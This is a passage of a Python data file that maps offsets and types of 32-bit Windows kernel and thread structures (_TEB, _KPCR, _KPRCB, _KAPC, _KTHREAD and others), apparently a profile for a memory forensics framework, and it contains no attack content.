'glCurrentRC' : [ 0xbec, ['pointer', ['void']]],
'glContext' : [ 0xbf0, ['pointer', ['void']]],
'LastStatusValue' : [ 0xbf4, ['unsigned long']],
'StaticUnicodeString' : [ 0xbf8, ['_UNICODE_STRING']],
'StaticUnicodeBuffer' : [ 0xc00, ['array', 261, ['wchar']]],
'DeallocationStack' : [ 0xe0c, ['pointer', ['void']]],
'TlsSlots' : [ 0xe10, ['array', 64, ['pointer', ['void']]]],
'TlsLinks' : [ 0xf10, ['_LIST_ENTRY']],
'Vdm' : [ 0xf18, ['pointer', ['void']]],
'ReservedForNtRpc' : [ 0xf1c, ['pointer', ['void']]],
'DbgSsReserved' : [ 0xf20, ['array', 2, ['pointer', ['void']]]],
'HardErrorMode' : [ 0xf28, ['unsigned long']],
'Instrumentation' : [ 0xf2c, ['array', 9, ['pointer', ['void']]]],
'ActivityId' : [ 0xf50, ['_GUID']],
'SubProcessTag' : [ 0xf60, ['pointer', ['void']]],
'EtwLocalData' : [ 0xf64, ['pointer', ['void']]],
'EtwTraceData' : [ 0xf68, ['pointer', ['void']]],
'WinSockData' : [ 0xf6c, ['pointer', ['void']]],
'GdiBatchCount' : [ 0xf70, ['unsigned long']],
'CurrentIdealProcessor' : [ 0xf74, ['_PROCESSOR_NUMBER']],
'IdealProcessorValue' : [ 0xf74, ['unsigned long']],
'ReservedPad0' : [ 0xf74, ['unsigned char']],
'ReservedPad1' : [ 0xf75, ['unsigned char']],
'ReservedPad2' : [ 0xf76, ['unsigned char']],
'IdealProcessor' : [ 0xf77, ['unsigned char']],
'GuaranteedStackBytes' : [ 0xf78, ['unsigned long']],
'ReservedForPerf' : [ 0xf7c, ['pointer', ['void']]],
'ReservedForOle' : [ 0xf80, ['pointer', ['void']]],
'WaitingOnLoaderLock' : [ 0xf84, ['unsigned long']],
'SavedPriorityState' : [ 0xf88, ['pointer', ['void']]],
'SoftPatchPtr1' : [ 0xf8c, ['unsigned long']],
'ThreadPoolData' : [ 0xf90, ['pointer', ['void']]],
'TlsExpansionSlots' : [ 0xf94, ['pointer', ['pointer', ['void']]]],
'MuiGeneration' : [ 0xf98, ['unsigned long']],
'IsImpersonating' : [ 0xf9c, ['unsigned long']],
'NlsCache' : [ 0xfa0, ['pointer', ['void']]],
'pShimData' : [ 0xfa4, ['pointer', ['void']]],
'HeapVirtualAffinity' : [ 0xfa8, ['unsigned long']],
'CurrentTransactionHandle' : [ 0xfac, ['pointer', ['void']]],
'ActiveFrame' : [ 0xfb0, ['pointer', ['_TEB_ACTIVE_FRAME']]],
'FlsData' : [ 0xfb4, ['pointer', ['void']]],
'PreferredLanguages' : [ 0xfb8, ['pointer', ['void']]],
'UserPrefLanguages' : [ 0xfbc, ['pointer', ['void']]],
'MergedPrefLanguages' : [ 0xfc0, ['pointer', ['void']]],
'MuiImpersonation' : [ 0xfc4, ['unsigned long']],
'CrossTebFlags' : [ 0xfc8, ['unsigned short']],
'SpareCrossTebBits' : [ 0xfc8, ['BitField', dict(start_bit = 0, end_bit = 16, native_type='unsigned short')]],
'SameTebFlags' : [ 0xfca, ['unsigned short']],
'SafeThunkCall' : [ 0xfca, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned short')]],
'InDebugPrint' : [ 0xfca, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned short')]],
'HasFiberData' : [ 0xfca, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned short')]],
'SkipThreadAttach' : [ 0xfca, ['BitField', dict(start_bit = 3, end_bit = 4, native_type='unsigned short')]],
'WerInShipAssertCode' : [ 0xfca, ['BitField', dict(start_bit = 4, end_bit = 5, native_type='unsigned short')]],
'RanProcessInit' : [ 0xfca, ['BitField', dict(start_bit = 5, end_bit = 6, native_type='unsigned short')]],
'ClonedThread' : [ 0xfca, ['BitField', dict(start_bit = 6, end_bit = 7, native_type='unsigned short')]],
'SuppressDebugMsg' : [ 0xfca, ['BitField', dict(start_bit = 7, end_bit = 8, native_type='unsigned short')]],
'DisableUserStackWalk' : [ 0xfca, ['BitField', dict(start_bit = 8, end_bit = 9, native_type='unsigned short')]],
'RtlExceptionAttached' : [ 0xfca, ['BitField', dict(start_bit = 9, end_bit = 10, native_type='unsigned short')]],
'InitialThread' : [ 0xfca, ['BitField', dict(start_bit = 10, end_bit = 11, native_type='unsigned short')]],
'SpareSameTebBits' : [ 0xfca, ['BitField', dict(start_bit = 11, end_bit = 16, native_type='unsigned short')]],
'TxnScopeEnterCallback' : [ 0xfcc, ['pointer', ['void']]],
'TxnScopeExitCallback' : [ 0xfd0, ['pointer', ['void']]],
'TxnScopeContext' : [ 0xfd4, ['pointer', ['void']]],
'LockCount' : [ 0xfd8, ['unsigned long']],
'SpareUlong0' : [ 0xfdc, ['unsigned long']],
'ResourceRetValue' : [ 0xfe0, ['pointer', ['void']]],
} ],
'_LIST_ENTRY' : [ 0x8, {
'Flink' : [ 0x0, ['pointer', ['_LIST_ENTRY']]],
'Blink' : [ 0x4, ['pointer', ['_LIST_ENTRY']]],
} ],
'_SINGLE_LIST_ENTRY' : [ 0x4, {
'Next' : [ 0x0, ['pointer', ['_SINGLE_LIST_ENTRY']]],
} ],
'_RTL_DYNAMIC_HASH_TABLE_CONTEXT' : [ 0xc, {
'ChainHead' : [ 0x0, ['pointer', ['_LIST_ENTRY']]],
'PrevLinkage' : [ 0x4, ['pointer', ['_LIST_ENTRY']]],
'Signature' : [ 0x8, ['unsigned long']],
} ],
'_RTL_DYNAMIC_HASH_TABLE_ENUMERATOR' : [ 0x14, {
'HashEntry' : [ 0x0, ['_RTL_DYNAMIC_HASH_TABLE_ENTRY']],
'ChainHead' : [ 0xc, ['pointer', ['_LIST_ENTRY']]],
'BucketIndex' : [ 0x10, ['unsigned long']],
} ],
'_RTL_DYNAMIC_HASH_TABLE' : [ 0x24, {
'Flags' : [ 0x0, ['unsigned long']],
'Shift' : [ 0x4, ['unsigned long']],
'TableSize' : [ 0x8, ['unsigned long']],
'Pivot' : [ 0xc, ['unsigned long']],
'DivisorMask' : [ 0x10, ['unsigned long']],
'NumEntries' : [ 0x14, ['unsigned long']],
'NonEmptyBuckets' : [ 0x18, ['unsigned long']],
'NumEnumerators' : [ 0x1c, ['unsigned long']],
'Directory' : [ 0x20, ['pointer', ['void']]],
} ],
'_UNICODE_STRING' : [ 0x8, {
'Length' : [ 0x0, ['unsigned short']],
'MaximumLength' : [ 0x2, ['unsigned short']],
'Buffer' : [ 0x4, ['pointer', ['unsigned short']]],
} ],
'_STRING' : [ 0x8, {
'Length' : [ 0x0, ['unsigned short']],
'MaximumLength' : [ 0x2, ['unsigned short']],
'Buffer' : [ 0x4, ['pointer', ['unsigned char']]],
} ],
'_LUID' : [ 0x8, {
'LowPart' : [ 0x0, ['unsigned long']],
'HighPart' : [ 0x4, ['long']],
} ],
'_IMAGE_NT_HEADERS' : [ 0xf8, {
'Signature' : [ 0x0, ['unsigned long']],
'FileHeader' : [ 0x4, ['_IMAGE_FILE_HEADER']],
'OptionalHeader' : [ 0x18, ['_IMAGE_OPTIONAL_HEADER']],
} ],
'_IMAGE_DOS_HEADER' : [ 0x40, {
'e_magic' : [ 0x0, ['unsigned short']],
'e_cblp' : [ 0x2, ['unsigned short']],
'e_cp' : [ 0x4, ['unsigned short']],
'e_crlc' : [ 0x6, ['unsigned short']],
'e_cparhdr' : [ 0x8, ['unsigned short']],
'e_minalloc' : [ 0xa, ['unsigned short']],
'e_maxalloc' : [ 0xc, ['unsigned short']],
'e_ss' : [ 0xe, ['unsigned short']],
'e_sp' : [ 0x10, ['unsigned short']],
'e_csum' : [ 0x12, ['unsigned short']],
'e_ip' : [ 0x14, ['unsigned short']],
'e_cs' : [ 0x16, ['unsigned short']],
'e_lfarlc' : [ 0x18, ['unsigned short']],
'e_ovno' : [ 0x1a, ['unsigned short']],
'e_res' : [ 0x1c, ['array', 4, ['unsigned short']]],
'e_oemid' : [ 0x24, ['unsigned short']],
'e_oeminfo' : [ 0x26, ['unsigned short']],
'e_res2' : [ 0x28, ['array', 10, ['unsigned short']]],
'e_lfanew' : [ 0x3c, ['long']],
} ],
'_KPCR' : [ 0x3748, {
'NtTib' : [ 0x0, ['_NT_TIB']],
'Used_ExceptionList' : [ 0x0, ['pointer', ['_EXCEPTION_REGISTRATION_RECORD']]],
'Used_StackBase' : [ 0x4, ['pointer', ['void']]],
'Spare2' : [ 0x8, ['pointer', ['void']]],
'TssCopy' : [ 0xc, ['pointer', ['void']]],
'ContextSwitches' : [ 0x10, ['unsigned long']],
'SetMemberCopy' : [ 0x14, ['unsigned long']],
'Used_Self' : [ 0x18, ['pointer', ['void']]],
'SelfPcr' : [ 0x1c, ['pointer', ['_KPCR']]],
'Prcb' : [ 0x20, ['pointer', ['_KPRCB']]],
'Irql' : [ 0x24, ['unsigned char']],
'IRR' : [ 0x28, ['unsigned long']],
'IrrActive' : [ 0x2c, ['unsigned long']],
'IDR' : [ 0x30, ['unsigned long']],
'KdVersionBlock' : [ 0x34, ['pointer', ['void']]],
'IDT' : [ 0x38, ['pointer', ['_KIDTENTRY']]],
'GDT' : [ 0x3c, ['pointer', ['_KGDTENTRY']]],
'TSS' : [ 0x40, ['pointer', ['_KTSS']]],
'MajorVersion' : [ 0x44, ['unsigned short']],
'MinorVersion' : [ 0x46, ['unsigned short']],
'SetMember' : [ 0x48, ['unsigned long']],
'StallScaleFactor' : [ 0x4c, ['unsigned long']],
'SpareUnused' : [ 0x50, ['unsigned char']],
'Number' : [ 0x51, ['unsigned char']],
'Spare0' : [ 0x52, ['unsigned char']],
'SecondLevelCacheAssociativity' : [ 0x53, ['unsigned char']],
'VdmAlert' : [ 0x54, ['unsigned long']],
'KernelReserved' : [ 0x58, ['array', 14, ['unsigned long']]],
'SecondLevelCacheSize' : [ 0x90, ['unsigned long']],
'HalReserved' : [ 0x94, ['array', 16, ['unsigned long']]],
'InterruptMode' : [ 0xd4, ['unsigned long']],
'Spare1' : [ 0xd8, ['unsigned char']],
'KernelReserved2' : [ 0xdc, ['array', 17, ['unsigned long']]],
'PrcbData' : [ 0x120, ['_KPRCB']],
} ],
'_KPRCB' : [ 0x3628, {
'MinorVersion' : [ 0x0, ['unsigned short']],
'MajorVersion' : [ 0x2, ['unsigned short']],
'CurrentThread' : [ 0x4, ['pointer', ['_KTHREAD']]],
'NextThread' : [ 0x8, ['pointer', ['_KTHREAD']]],
'IdleThread' : [ 0xc, ['pointer', ['_KTHREAD']]],
'LegacyNumber' : [ 0x10, ['unsigned char']],
'NestingLevel' : [ 0x11, ['unsigned char']],
'BuildType' : [ 0x12, ['unsigned short']],
'CpuType' : [ 0x14, ['unsigned char']],
'CpuID' : [ 0x15, ['unsigned char']],
'CpuStep' : [ 0x16, ['unsigned short']],
'CpuStepping' : [ 0x16, ['unsigned char']],
'CpuModel' : [ 0x17, ['unsigned char']],
'ProcessorState' : [ 0x18, ['_KPROCESSOR_STATE']],
'KernelReserved' : [ 0x338, ['array', 16, ['unsigned long']]],
'HalReserved' : [ 0x378, ['array', 16, ['unsigned long']]],
'CFlushSize' : [ 0x3b8, ['unsigned long']],
'CoresPerPhysicalProcessor' : [ 0x3bc, ['unsigned char']],
'LogicalProcessorsPerCore' : [ 0x3bd, ['unsigned char']],
'PrcbPad0' : [ 0x3be, ['array', 2, ['unsigned char']]],
'MHz' : [ 0x3c0, ['unsigned long']],
'CpuVendor' : [ 0x3c4, ['unsigned char']],
'GroupIndex' : [ 0x3c5, ['unsigned char']],
'Group' : [ 0x3c6, ['unsigned short']],
'GroupSetMember' : [ 0x3c8, ['unsigned long']],
'Number' : [ 0x3cc, ['unsigned long']],
'PrcbPad1' : [ 0x3d0, ['array', 72, ['unsigned char']]],
'LockQueue' : [ 0x418, ['array', 17, ['_KSPIN_LOCK_QUEUE']]],
'NpxThread' : [ 0x4a0, ['pointer', ['_KTHREAD']]],
'InterruptCount' : [ 0x4a4, ['unsigned long']],
'KernelTime' : [ 0x4a8, ['unsigned long']],
'UserTime' : [ 0x4ac, ['unsigned long']],
'DpcTime' : [ 0x4b0, ['unsigned long']],
'DpcTimeCount' : [ 0x4b4, ['unsigned long']],
'InterruptTime' : [ 0x4b8, ['unsigned long']],
'AdjustDpcThreshold' : [ 0x4bc, ['unsigned long']],
'PageColor' : [ 0x4c0, ['unsigned long']],
'DebuggerSavedIRQL' : [ 0x4c4, ['unsigned char']],
'NodeColor' : [ 0x4c5, ['unsigned char']],
'PrcbPad20' : [ 0x4c6, ['array', 2, ['unsigned char']]],
'NodeShiftedColor' : [ 0x4c8, ['unsigned long']],
'ParentNode' : [ 0x4cc, ['pointer', ['_KNODE']]],
'SecondaryColorMask' : [ 0x4d0, ['unsigned long']],
'DpcTimeLimit' : [ 0x4d4, ['unsigned long']],
'PrcbPad21' : [ 0x4d8, ['array', 2, ['unsigned long']]],
'CcFastReadNoWait' : [ 0x4e0, ['unsigned long']],
'CcFastReadWait' : [ 0x4e4, ['unsigned long']],
'CcFastReadNotPossible' : [ 0x4e8, ['unsigned long']],
'CcCopyReadNoWait' : [ 0x4ec, ['unsigned long']],
'CcCopyReadWait' : [ 0x4f0, ['unsigned long']],
'CcCopyReadNoWaitMiss' : [ 0x4f4, ['unsigned long']],
'MmSpinLockOrdering' : [ 0x4f8, ['long']],
'IoReadOperationCount' : [ 0x4fc, ['long']],
'IoWriteOperationCount' : [ 0x500, ['long']],
'IoOtherOperationCount' : [ 0x504, ['long']],
'IoReadTransferCount' : [ 0x508, ['_LARGE_INTEGER']],
'IoWriteTransferCount' : [ 0x510, ['_LARGE_INTEGER']],
'IoOtherTransferCount' : [ 0x518, ['_LARGE_INTEGER']],
'CcFastMdlReadNoWait' : [ 0x520, ['unsigned long']],
'CcFastMdlReadWait' : [ 0x524, ['unsigned long']],
'CcFastMdlReadNotPossible' : [ 0x528, ['unsigned long']],
'CcMapDataNoWait' : [ 0x52c, ['unsigned long']],
'CcMapDataWait' : [ 0x530, ['unsigned long']],
'CcPinMappedDataCount' : [ 0x534, ['unsigned long']],
'CcPinReadNoWait' : [ 0x538, ['unsigned long']],
'CcPinReadWait' : [ 0x53c, ['unsigned long']],
'CcMdlReadNoWait' : [ 0x540, ['unsigned long']],
'CcMdlReadWait' : [ 0x544, ['unsigned long']],
'CcLazyWriteHotSpots' : [ 0x548, ['unsigned long']],
'CcLazyWriteIos' : [ 0x54c, ['unsigned long']],
'CcLazyWritePages' : [ 0x550, ['unsigned long']],
'CcDataFlushes' : [ 0x554, ['unsigned long']],
'CcDataPages' : [ 0x558, ['unsigned long']],
'CcLostDelayedWrites' : [ 0x55c, ['unsigned long']],
'CcFastReadResourceMiss' : [ 0x560, ['unsigned long']],
'CcCopyReadWaitMiss' : [ 0x564, ['unsigned long']],
'CcFastMdlReadResourceMiss' : [ 0x568, ['unsigned long']],
'CcMapDataNoWaitMiss' : [ 0x56c, ['unsigned long']],
'CcMapDataWaitMiss' : [ 0x570, ['unsigned long']],
'CcPinReadNoWaitMiss' : [ 0x574, ['unsigned long']],
'CcPinReadWaitMiss' : [ 0x578, ['unsigned long']],
'CcMdlReadNoWaitMiss' : [ 0x57c, ['unsigned long']],
'CcMdlReadWaitMiss' : [ 0x580, ['unsigned long']],
'CcReadAheadIos' : [ 0x584, ['unsigned long']],
'KeAlignmentFixupCount' : [ 0x588, ['unsigned long']],
'KeExceptionDispatchCount' : [ 0x58c, ['unsigned long']],
'KeSystemCalls' : [ 0x590, ['unsigned long']],
'AvailableTime' : [ 0x594, ['unsigned long']],
'PrcbPad22' : [ 0x598, ['array', 2, ['unsigned long']]],
'PPLookasideList' : [ 0x5a0, ['array', 16, ['_PP_LOOKASIDE_LIST']]],
'PPNPagedLookasideList' : [ 0x620, ['array', 32, ['_GENERAL_LOOKASIDE_POOL']]],
'PPPagedLookasideList' : [ 0xf20, ['array', 32, ['_GENERAL_LOOKASIDE_POOL']]],
'PacketBarrier' : [ 0x1820, ['unsigned long']],
'ReverseStall' : [ 0x1824, ['long']],
'IpiFrame' : [ 0x1828, ['pointer', ['void']]],
'PrcbPad3' : [ 0x182c, ['array', 52, ['unsigned char']]],
'CurrentPacket' : [ 0x1860, ['array', 3, ['pointer', ['void']]]],
'TargetSet' : [ 0x186c, ['unsigned long']],
'WorkerRoutine' : [ 0x1870, ['pointer', ['void']]],
'IpiFrozen' : [ 0x1874, ['unsigned long']],
'PrcbPad4' : [ 0x1878, ['array', 40, ['unsigned char']]],
'RequestSummary' : [ 0x18a0, ['unsigned long']],
'SignalDone' : [ 0x18a4, ['pointer', ['_KPRCB']]],
'PrcbPad50' : [ 0x18a8, ['array', 56, ['unsigned char']]],
'DpcData' : [ 0x18e0, ['array', 2, ['_KDPC_DATA']]],
'DpcStack' : [ 0x1908, ['pointer', ['void']]],
'MaximumDpcQueueDepth' : [ 0x190c, ['long']],
'DpcRequestRate' : [ 0x1910, ['unsigned long']],
'MinimumDpcRate' : [ 0x1914, ['unsigned long']],
'DpcLastCount' : [ 0x1918, ['unsigned long']],
'PrcbLock' : [ 0x191c, ['unsigned long']],
'DpcGate' : [ 0x1920, ['_KGATE']],
'ThreadDpcEnable' : [ 0x1930, ['unsigned char']],
'QuantumEnd' : [ 0x1931, ['unsigned char']],
'DpcRoutineActive' : [ 0x1932, ['unsigned char']],
'IdleSchedule' : [ 0x1933, ['unsigned char']],
'DpcRequestSummary' : [ 0x1934, ['long']],
'DpcRequestSlot' : [ 0x1934, ['array', 2, ['short']]],
'NormalDpcState' : [ 0x1934, ['short']],
'DpcThreadActive' : [ 0x1936, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned short')]],
'ThreadDpcState' : [ 0x1936, ['short']],
'TimerHand' : [ 0x1938, ['unsigned long']],
'LastTick' : [ 0x193c, ['unsigned long']],
'MasterOffset' : [ 0x1940, ['long']],
'PrcbPad41' : [ 0x1944, ['array', 2, ['unsigned long']]],
'PeriodicCount' : [ 0x194c, ['unsigned long']],
'PeriodicBias' : [ 0x1950, ['unsigned long']],
'TickOffset' : [ 0x1958, ['unsigned long long']],
'TimerTable' : [ 0x1960, ['_KTIMER_TABLE']],
'CallDpc' : [ 0x31a0, ['_KDPC']],
'ClockKeepAlive' : [ 0x31c0, ['long']],
'ClockCheckSlot' : [ 0x31c4, ['unsigned char']],
'ClockPollCycle' : [ 0x31c5, ['unsigned char']],
'PrcbPad6' : [ 0x31c6, ['array', 2, ['unsigned char']]],
'DpcWatchdogPeriod' : [ 0x31c8, ['long']],
'DpcWatchdogCount' : [ 0x31cc, ['long']],
'ThreadWatchdogPeriod' : [ 0x31d0, ['long']],
'ThreadWatchdogCount' : [ 0x31d4, ['long']],
'KeSpinLockOrdering' : [ 0x31d8, ['long']],
'PrcbPad70' : [ 0x31dc, ['array', 1, ['unsigned long']]],
'WaitListHead' : [ 0x31e0, ['_LIST_ENTRY']],
'WaitLock' : [ 0x31e8, ['unsigned long']],
'ReadySummary' : [ 0x31ec, ['unsigned long']],
'QueueIndex' : [ 0x31f0, ['unsigned long']],
'DeferredReadyListHead' : [ 0x31f4, ['_SINGLE_LIST_ENTRY']],
'StartCycles' : [ 0x31f8, ['unsigned long long']],
'CycleTime' : [ 0x3200, ['unsigned long long']],
'HighCycleTime' : [ 0x3208, ['unsigned long']],
'PrcbPad71' : [ 0x320c, ['unsigned long']],
'PrcbPad72' : [ 0x3210, ['array', 2, ['unsigned long long']]],
'DispatcherReadyListHead' : [ 0x3220, ['array', 32, ['_LIST_ENTRY']]],
'ChainedInterruptList' : [ 0x3320, ['pointer', ['void']]],
'LookasideIrpFloat' : [ 0x3324, ['long']],
'MmPageFaultCount' : [ 0x3328, ['long']],
'MmCopyOnWriteCount' : [ 0x332c, ['long']],
'MmTransitionCount' : [ 0x3330, ['long']],
'MmCacheTransitionCount' : [ 0x3334, ['long']],
'MmDemandZeroCount' : [ 0x3338, ['long']],
'MmPageReadCount' : [ 0x333c, ['long']],
'MmPageReadIoCount' : [ 0x3340, ['long']],
'MmCacheReadCount' : [ 0x3344, ['long']],
'MmCacheIoCount' : [ 0x3348, ['long']],
'MmDirtyPagesWriteCount' : [ 0x334c, ['long']],
'MmDirtyWriteIoCount' : [ 0x3350, ['long']],
'MmMappedPagesWriteCount' : [ 0x3354, ['long']],
'MmMappedWriteIoCount' : [ 0x3358, ['long']],
'CachedCommit' : [ 0x335c, ['unsigned long']],
'CachedResidentAvailable' : [ 0x3360, ['unsigned long']],
'HyperPte' : [ 0x3364, ['pointer', ['void']]],
'PrcbPad8' : [ 0x3368, ['array', 4, ['unsigned char']]],
'VendorString' : [ 0x336c, ['array', 13, ['unsigned char']]],
'InitialApicId' : [ 0x3379, ['unsigned char']],
'LogicalProcessorsPerPhysicalProcessor' : [ 0x337a, ['unsigned char']],
'PrcbPad9' : [ 0x337b, ['array', 5, ['unsigned char']]],
'FeatureBits' : [ 0x3380, ['unsigned long']],
'UpdateSignature' : [ 0x3388, ['_LARGE_INTEGER']],
'IsrTime' : [ 0x3390, ['unsigned long long']],
'RuntimeAccumulation' : [ 0x3398, ['unsigned long long']],
'PowerState' : [ 0x33a0, ['_PROCESSOR_POWER_STATE']],
'DpcWatchdogDpc' : [ 0x3468, ['_KDPC']],
'DpcWatchdogTimer' : [ 0x3488, ['_KTIMER']],
'WheaInfo' : [ 0x34b0, ['pointer', ['void']]],
'EtwSupport' : [ 0x34b4, ['pointer', ['void']]],
'InterruptObjectPool' : [ 0x34b8, ['_SLIST_HEADER']],
'HypercallPageList' : [ 0x34c0, ['_SLIST_HEADER']],
'HypercallPageVirtual' : [ 0x34c8, ['pointer', ['void']]],
'VirtualApicAssist' : [ 0x34cc, ['pointer', ['void']]],
'StatisticsPage' : [ 0x34d0, ['pointer', ['unsigned long long']]],
'RateControl' : [ 0x34d4, ['pointer', ['void']]],
'Cache' : [ 0x34d8, ['array', 5, ['_CACHE_DESCRIPTOR']]],
'CacheCount' : [ 0x3514, ['unsigned long']],
'CacheProcessorMask' : [ 0x3518, ['array', 5, ['unsigned long']]],
'PackageProcessorSet' : [ 0x352c, ['_KAFFINITY_EX']],
'PrcbPad91' : [ 0x3538, ['array', 1, ['unsigned long']]],
'CoreProcessorSet' : [ 0x353c, ['unsigned long']],
'TimerExpirationDpc' : [ 0x3540, ['_KDPC']],
'SpinLockAcquireCount' : [ 0x3560, ['unsigned long']],
'SpinLockContentionCount' : [ 0x3564, ['unsigned long']],
'SpinLockSpinCount' : [ 0x3568, ['unsigned long']],
'IpiSendRequestBroadcastCount' : [ 0x356c, ['unsigned long']],
'IpiSendRequestRoutineCount' : [ 0x3570, ['unsigned long']],
'IpiSendSoftwareInterruptCount' : [ 0x3574, ['unsigned long']],
'ExInitializeResourceCount' : [ 0x3578, ['unsigned long']],
'ExReInitializeResourceCount' : [ 0x357c, ['unsigned long']],
'ExDeleteResourceCount' : [ 0x3580, ['unsigned long']],
'ExecutiveResourceAcquiresCount' : [ 0x3584, ['unsigned long']],
'ExecutiveResourceContentionsCount' : [ 0x3588, ['unsigned long']],
'ExecutiveResourceReleaseExclusiveCount' : [ 0x358c, ['unsigned long']],
'ExecutiveResourceReleaseSharedCount' : [ 0x3590, ['unsigned long']],
'ExecutiveResourceConvertsCount' : [ 0x3594, ['unsigned long']],
'ExAcqResExclusiveAttempts' : [ 0x3598, ['unsigned long']],
'ExAcqResExclusiveAcquiresExclusive' : [ 0x359c, ['unsigned long']],
'ExAcqResExclusiveAcquiresExclusiveRecursive' : [ 0x35a0, ['unsigned long']],
'ExAcqResExclusiveWaits' : [ 0x35a4, ['unsigned long']],
'ExAcqResExclusiveNotAcquires' : [ 0x35a8, ['unsigned long']],
'ExAcqResSharedAttempts' : [ 0x35ac, ['unsigned long']],
'ExAcqResSharedAcquiresExclusive' : [ 0x35b0, ['unsigned long']],
'ExAcqResSharedAcquiresShared' : [ 0x35b4, ['unsigned long']],
'ExAcqResSharedAcquiresSharedRecursive' : [ 0x35b8, ['unsigned long']],
'ExAcqResSharedWaits' : [ 0x35bc, ['unsigned long']],
'ExAcqResSharedNotAcquires' : [ 0x35c0, ['unsigned long']],
'ExAcqResSharedStarveExclusiveAttempts' : [ 0x35c4, ['unsigned long']],
'ExAcqResSharedStarveExclusiveAcquiresExclusive' : [ 0x35c8, ['unsigned long']],
'ExAcqResSharedStarveExclusiveAcquiresShared' : [ 0x35cc, ['unsigned long']],
'ExAcqResSharedStarveExclusiveAcquiresSharedRecursive' : [ 0x35d0, ['unsigned long']],
'ExAcqResSharedStarveExclusiveWaits' : [ 0x35d4, ['unsigned long']],
'ExAcqResSharedStarveExclusiveNotAcquires' : [ 0x35d8, ['unsigned long']],
'ExAcqResSharedWaitForExclusiveAttempts' : [ 0x35dc, ['unsigned long']],
'ExAcqResSharedWaitForExclusiveAcquiresExclusive' : [ 0x35e0, ['unsigned long']],
'ExAcqResSharedWaitForExclusiveAcquiresShared' : [ 0x35e4, ['unsigned long']],
'ExAcqResSharedWaitForExclusiveAcquiresSharedRecursive' : [ 0x35e8, ['unsigned long']],
'ExAcqResSharedWaitForExclusiveWaits' : [ 0x35ec, ['unsigned long']],
'ExAcqResSharedWaitForExclusiveNotAcquires' : [ 0x35f0, ['unsigned long']],
'ExSetResOwnerPointerExclusive' : [ 0x35f4, ['unsigned long']],
'ExSetResOwnerPointerSharedNew' : [ 0x35f8, ['unsigned long']],
'ExSetResOwnerPointerSharedOld' : [ 0x35fc, ['unsigned long']],
'ExTryToAcqExclusiveAttempts' : [ 0x3600, ['unsigned long']],
'ExTryToAcqExclusiveAcquires' : [ 0x3604, ['unsigned long']],
'ExBoostExclusiveOwner' : [ 0x3608, ['unsigned long']],
'ExBoostSharedOwners' : [ 0x360c, ['unsigned long']],
'ExEtwSynchTrackingNotificationsCount' : [ 0x3610, ['unsigned long']],
'ExEtwSynchTrackingNotificationsAccountedCount' : [ 0x3614, ['unsigned long']],
'Context' : [ 0x3618, ['pointer', ['_CONTEXT']]],
'ContextFlags' : [ 0x361c, ['unsigned long']],
'ExtendedState' : [ 0x3620, ['pointer', ['_XSAVE_AREA']]],
} ],
'_KAPC' : [ 0x30, {
'Type' : [ 0x0, ['unsigned char']],
'SpareByte0' : [ 0x1, ['unsigned char']],
'Size' : [ 0x2, ['unsigned char']],
'SpareByte1' : [ 0x3, ['unsigned char']],
'SpareLong0' : [ 0x4, ['unsigned long']],
'Thread' : [ 0x8, ['pointer', ['_KTHREAD']]],
'ApcListEntry' : [ 0xc, ['_LIST_ENTRY']],
'KernelRoutine' : [ 0x14, ['pointer', ['void']]],
'RundownRoutine' : [ 0x18, ['pointer', ['void']]],
'NormalRoutine' : [ 0x1c, ['pointer', ['void']]],
'NormalContext' : [ 0x20, ['pointer', ['void']]],
'SystemArgument1' : [ 0x24, ['pointer', ['void']]],
'SystemArgument2' : [ 0x28, ['pointer', ['void']]],
'ApcStateIndex' : [ 0x2c, ['unsigned char']],
'ApcMode' : [ 0x2d, ['unsigned char']],
'Inserted' : [ 0x2e, ['unsigned char']],
} ],
'_KTHREAD' : [ 0x200, {
'Header' : [ 0x0, ['_DISPATCHER_HEADER']],
'CycleTime' : [ 0x10, ['unsigned long long']],
'HighCycleTime' : [ 0x18, ['unsigned long']],
'QuantumTarget' : [ 0x20, ['unsigned long long']],
'InitialStack' : [ 0x28, ['pointer', ['void']]],
'StackLimit' : [ 0x2c, ['pointer', ['void']]],
'KernelStack' : [ 0x30, ['pointer', ['void']]],
'ThreadLock' : [ 0x34, ['unsigned long']],
'WaitRegister' : [ 0x38, ['_KWAIT_STATUS_REGISTER']],
'Running' : [ 0x39, ['unsigned char']],
'Alerted' : [ 0x3a, ['array', 2, ['unsigned char']]],
'KernelStackResident' : [ 0x3c, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'ReadyTransition' : [ 0x3c, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned long')]],
'ProcessReadyQueue' : [ 0x3c, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned long')]],
'WaitNext' : [ 0x3c, ['BitField', dict(start_bit = 3, end_bit = 4, native_type='unsigned long')]],
'SystemAffinityActive' : [ 0x3c, ['BitField', dict(start_bit = 4, end_bit = 5, native_type='unsigned long')]],
'Alertable' : [ 0x3c, ['BitField', dict(start_bit = 5, end_bit = 6, native_type='unsigned long')]],
'GdiFlushActive' : [ 0x3c, ['BitField', dict(start_bit = 6, end_bit = 7, native_type='unsigned long')]],
'UserStackWalkActive' : [ 0x3c, ['BitField', dict(start_bit = 7, end_bit = 8, native_type='unsigned long')]],
'ApcInterruptRequest' : [ 0x3c, ['BitField', dict(start_bit = 8, end_bit = 9, native_type='unsigned long')]],
'ForceDeferSchedule' : [ 0x3c, ['BitField', dict(start_bit = 9, end_bit = 10, native_type='unsigned long')]],
'QuantumEndMigrate' : [ 0x3c, ['BitField', dict(start_bit = 10, end_bit = 11, native_type='unsigned long')]],
'UmsDirectedSwitchEnable' : [ 0x3c, ['BitField', dict(start_bit = 11, end_bit = 12, native_type='unsigned long')]],
'TimerActive' : [ 0x3c, ['BitField', dict(start_bit = 12, end_bit = 13, native_type='unsigned long')]],
'Reserved' : [ 0x3c, ['BitField', dict(start_bit = 13, end_bit = 32, native_type='unsigned long')]],
'MiscFlags' : [ 0x3c, ['long']],
'ApcState' : [ 0x40, ['_KAPC_STATE']],
'ApcStateFill' : [ 0x40, ['array', 23, ['unsigned char']]],
'Priority' : [ 0x57, ['unsigned char']],
'NextProcessor' : [ 0x58, ['unsigned long']],
'DeferredProcessor' : [ 0x5c, ['unsigned long']],
'ApcQueueLock' : [ 0x60, ['unsigned long']],
'ContextSwitches' : [ 0x64, ['unsigned long']],
'State' : [ 0x68, ['unsigned char']],
